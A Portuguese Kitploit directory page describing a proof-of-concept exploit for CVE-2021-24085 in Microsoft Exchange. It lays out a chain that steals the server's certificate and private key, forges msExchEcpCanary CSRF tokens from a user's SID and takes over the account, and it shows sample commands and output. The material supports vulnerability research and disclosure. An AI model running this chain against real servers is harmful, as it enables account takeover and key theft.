Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-24085 — Exploit de prova de conceito para CVE-2021-24085: elevação de privilégio baseada em CSRF no Microsoft Exchange Server via falsificação de token msExchEcpCanary, possibilitando a tomada de conta. | Kitploit
Ferramentas/GitHubGitHub/sourceincite/cve-2021-24085
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

Exploit de prova de conceito para CVE-2021-24085: elevação de privilégio baseada em CSRF no Microsoft Exchange Server via falsificação de token msExchEcpCanary, possibilitando a tomada de conta.

Ver Repositório
71182há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de Elevação de Privilégio por Cross Site Request Forgery no Microsoft Exchange Server msExchEcpCanary

Este é um Proof of Concept para CVE-2021-24085.

  1. poc.py baixa o arquivo de certificado do alvo com a chave privada interna
  2. YellowCanary gera o token csrf msExchEcpCanary para um usuário específico com base no SID
  3. poc.js é o exploit csrf para desencadear uma tomada de conta

Eu não forneci o arquivo malicifest.xml, mas você pode encontrar informações sobre como gerar um arquivo de manifesto malicioso a partir dos recursos disponíveis na seção de referências abaixo.

Exemplo

Acesse o certificado com a chave privada dentro:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

Agora você pode gerar tokens csrf com YellowCanary usando o SID de um usuário alvo:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

Referências:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
Baixar ferramenta